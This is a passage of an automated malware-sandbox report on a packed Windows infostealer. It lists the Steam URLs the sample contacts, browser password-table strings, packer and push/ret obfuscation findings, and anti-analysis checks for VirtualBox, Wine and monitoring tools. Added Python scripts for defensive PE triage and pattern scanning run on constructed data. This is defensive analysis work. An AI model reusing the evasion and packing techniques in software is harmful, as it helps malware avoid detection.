            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/U
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
            Source: file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/p
            Source: file.exe, 00000000.00000003.1690568055.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690697919.0000000001265000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900&
            Source: file.exe, 00000000.00000003.1690568055.0000000001248000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
            Source: file.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690568055.000000000124F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700659896.000000000124F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
            Source: file.exe, 00000000.00000003.1690568055.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
            Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e7
            Source: file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: file.exe, 00000000.00000003.1718877156.0000000005C3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000000.00000003.1718877156.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: file.exe, 00000000.00000003.1718877156.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: file.exe, 00000000.00000003.1700772120.000000000128B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: file.exe, 00000000.00000003.1700849717.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-
            Source: file.exe, 00000000.00000003.1700628151.00000000012D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719628135.0000000005BF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: file.exe, 00000000.00000003.1719446245.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1719330275.0000000005C0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.1754118021.0000000005EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700628151.00000000012DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
            Source: file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
            Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2

            System Summary

            barindex
            Source: file.exe | Static PE information: section name:
            Source: file.exe | Static PE information: section name: .rsrc
            Source: file.exe | Static PE information: section name: .idata
            Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exe | Static PE information: Section: ZLIB complexity 0.9995487830033003
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@10/2
            Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: file.exe, 00000000.00000003.1719103299.0000000005C14000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exe | Virustotal: Detection: 43%
            Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: file.exe | String found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe
            Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
            Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
            Source: file.exe | Static file information: File size 3058688 > 1048576
            Source: file.exe | Static PE information: Raw size of teechqve is bigger than: 0x100000 < 0x2c1600
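            The "Static PE information" lines above (non-standard section names, a section whose ZLIB complexity is close to 1, an oversized raw section) and the checksum and entry-point findings in the Data Obfuscation section can be reproduced without a sandbox. The script below is an added example written for this page; it is not Joe Sandbox code and was not taken from the sample. It parses the PE headers with the standard library only and runs against a constructed in-memory PE32 whose layout imitates a packed binary: the section names, the entry RVA inside .taggant, the wrong CheckSum value and the allowlist of "standard" section names are all assumptions made for the demo.

```python
"""Static PE triage: section names, per-section entropy and zlib ratio,
the section holding the entry point, and the PE CheckSum field."""
import hashlib
import math
import struct
import zlib
from collections import Counter

# Assumed allowlist; anything else is reported the way the sandbox lists odd names.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: ~8.0 for compressed/encrypted data, 0 for padding."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def zlib_ratio(buf: bytes) -> float:
    """compressed size / raw size (the report's 'ZLIB complexity')."""
    return len(zlib.compress(buf, 9)) / len(buf) if buf else 0.0


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """CheckSumMappedFile algorithm: fold the image as 32-bit words, skipping the
    CheckSum dword itself, then add the file length."""
    assert checksum_off % 4 == 0          # holds whenever e_lfanew is dword aligned
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def analyze_pe(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64               # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    computed = pe_checksum(data, checksum_off)
    sections, entry_section = [], None
    for i in range(nsec):                 # 40-byte IMAGE_SECTION_HEADERs follow the optional header
        hdr = opt + opt_size + 40 * i
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rsize, rptr = struct.unpack_from("<IIII", data, hdr + 8)
        body = data[rptr:rptr + rsize]
        sections.append({"name": name, "va": va, "vsize": vsize, "raw_size": rsize,
                         "standard": name in STANDARD_SECTIONS,
                         "entropy": round(shannon_entropy(body), 3),
                         "zlib_ratio": round(zlib_ratio(body), 4)})
        if va <= entry_rva < va + max(vsize, rsize):
            entry_section = name
    return {"sections": sections,
            "suspicious_sections": [s["name"] for s in sections if not s["standard"]],
            "entry_rva": entry_rva, "entry_section": entry_section,
            "entry_outside_standard": entry_section not in STANDARD_SECTIONS,
            "stored_checksum": stored, "computed_checksum": computed,
            "checksum_ok": stored == computed}


def fix_checksum(data: bytes) -> bytes:
    """Write the computed value into the CheckSum field (what a linker does; packers often skip it)."""
    off = struct.unpack_from("<I", data, 0x3C)[0] + 4 + 20 + 64
    out = bytearray(data)
    struct.pack_into("<I", out, off, pe_checksum(data, off))
    return bytes(out)


def _pseudo_random(n: int, seed: bytes = b"demo") -> bytes:
    """Deterministic high-entropy filler (sha256 chain) standing in for packed data."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_demo_pe() -> bytes:
    """Constructed PE32, not the report's sample: NOP-filled .text, a high-entropy
    section with a random-looking name, the entry point in a trailing non-standard
    section, and a deliberately wrong CheckSum."""
    secs = [(b".text", b"\x90" * 0x1000, 0x1000, 0x60000020),
            (b"teechqve", _pseudo_random(0x1000), 0x2000, 0xE0000040),
            (b".taggant", b"\xCC" * 0x200, 0x4000, 0xE0000020)]
    hdr_size = 0x200
    img = bytearray(hdr_size)
    img[:2], img[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x40)                                  # e_lfanew
    coff, opt = 0x44, 0x58
    struct.pack_into("<HHIIIHH", img, coff, 0x14C, len(secs), 0, 0, 0, 0xE0, 0x0102)
    struct.pack_into("<H", img, opt, 0x10B)                                  # PE32 magic
    struct.pack_into("<I", img, opt + 16, 0x4010)                            # AddressOfEntryPoint -> .taggant
    struct.pack_into("<III", img, opt + 28, 0x400000, 0x1000, 0x200)         # ImageBase, SectionAlign, FileAlign
    struct.pack_into("<III", img, opt + 56, 0x5000, hdr_size, 0xDEADBEEF)    # SizeOfImage, SizeOfHeaders, CheckSum
    struct.pack_into("<H", img, opt + 68, 2)                                 # Subsystem: GUI
    struct.pack_into("<I", img, opt + 92, 16)                                # NumberOfRvaAndSizes
    body, raw_ptr = bytearray(), hdr_size
    for i, (name, content, va, flags) in enumerate(secs):
        hdr = opt + 0xE0 + 40 * i
        img[hdr:hdr + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", img, hdr + 8, len(content), va, len(content), raw_ptr)
        struct.pack_into("<I", img, hdr + 36, flags)
        body += content
        raw_ptr += len(content)
    return bytes(img + body)
```

            Run `analyze_pe(open(path, "rb").read())` on a real file; on the demo image it reports teechqve and .taggant as non-standard, the entry point inside .taggant, a zlib ratio near 1.0 for the filler section and a CheckSum mismatch, which is the same set of facts the report states for the sample. A zero CheckSum is common in unsigned binaries and is not suspicious on its own; a non-zero value that does not verify is more telling, since it means the field was written and then the image was modified.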

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.4d0000.0.unpack :EW;.rsrc :W;.idata :W;teechqve:EW;nqocidhr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;teechqve:EW;nqocidhr:EW;.taggant:EW;
            Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
            Source: file.exe | Static PE information: real checksum: 0x2f67a0 should be: 0x2f4a1f
            Source: file.exe | Static PE information: section name:
            Source: file.exe | Static PE information: section name: .rsrc
            Source: file.exe | Static PE information: section name: .idata
            Source: file.exe | Static PE information: section name: teechqve
            Source: file.exe | Static PE information: section name: nqocidhr
            Source: file.exe | Static PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_012F9C2C push 234F6F6Ch; ret 0_3_012F9C31
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_012FB71A push ecx; ret 0_3_012FB743
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_012F9F6A push ecx; ret 0_3_012F9FA1
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_012FB9AA push ds; ret 0_3_012FB9AB
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_012FDFA8 push eax; retf 0_3_012FDFA9
            Source: file.exe | Static PE information: section name: entropy: 7.982552792221966
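            The "Code function" lines above are push/ret pairs. `push imm32; ret` transfers control to the pushed address without a jmp or call opcode, so a disassembler that follows only branch instructions loses the control flow, which is why sandboxes flag the pattern as obfuscation. The scanner below is an added example for this page (not part of the report and not code from the sample) that finds the byte patterns behind the four forms listed: `68 imm32 C3`, `5x C3` and `5x CB` (push r32; ret/retf) and `06/0E/16/1E C3` (push sreg; ret), and rebases each hit to a dump address. The input bytes are constructed; the base address 0x012F9C2A is chosen so that the first hit lands at 0x012F9C2C, the address the report gives for `push 234F6F6Ch; ret`, and the 0x400000/0x300000 image range used to sanity-check targets is an assumption.

```python
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SEG_PUSH = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}   # one-byte push sreg opcodes


def scan_push_ret(code: bytes, base: int = 0) -> list:
    """Return (address, text, target) for every push/ret pair in `code`.

    target is the decoded imm32 for the 'push imm32; ret' form (the address the
    ret will jump to) and None for the register and segment forms.
    """
    hits, i, n = [], 0, len(code)
    while i < n:
        b = code[i]
        nxt = code[i + 1] if i + 1 < n else None
        # 68 <imm32> C3 : push imm32; ret  -- a jmp imm32 with no branch opcode
        if b == 0x68 and i + 5 < n and code[i + 5] == 0xC3:
            target = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, f"push {target:08X}h; ret", target))
            i += 6
            continue
        # 50..57 then C3/CB : push r32; ret / retf -- jump through a register value
        if 0x50 <= b <= 0x57 and nxt in (0xC3, 0xCB):
            mnemonic = "ret" if nxt == 0xC3 else "retf"
            hits.append((base + i, f"push {REG32[b - 0x50]}; {mnemonic}", None))
            i += 2
            continue
        # 06/0E/16/1E then C3 : push sreg; ret -- almost never legitimate code
        if b in SEG_PUSH and nxt == 0xC3:
            hits.append((base + i, f"push {SEG_PUSH[b]}; ret", None))
            i += 2
            continue
        i += 1
    return hits


def target_mapped(target: int, ranges: list) -> bool:
    """True if `target` falls inside one of the (start, size) ranges the image occupies."""
    return any(start <= target < start + size for start, size in ranges)


def demo_bytes() -> bytes:
    """Constructed input: two NOPs, the report's 'push 234F6F6Ch; ret' (little-endian
    6C 6F 4F 23), a NOP, then the three two-byte forms the report lists."""
    return (b"\x90\x90" + bytes.fromhex("686C6F4F23C3") + b"\x90"
            + bytes.fromhex("51C3") + bytes.fromhex("1EC3") + bytes.fromhex("50CB"))


if __name__ == "__main__":
    image = [(0x400000, 0x300000)]        # assumed image range for the demo
    for addr, text, target in scan_push_ret(demo_bytes(), base=0x012F9C2A):
        verdict = ""
        if target is not None:
            verdict = "  target inside image" if target_mapped(target, image) else "  target outside image"
        print(f"{addr:08X}  {text}{verdict}")
```

            Treat the two-byte forms as weak evidence: `5x C3` and `1E C3` occur by chance in data at roughly one position in 65536, so a linear sweep over a 3 MB file yields dozens of them. The six-byte `68 imm32 C3` form is specific, and its value is the decoded target: an address inside the mapped image means a real disguised jump, while a target such as 0x234F6F6C that lies nowhere near the image means the bytes are data or unpacked filler that happened to decode this way.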

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
            Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
            Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
            Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
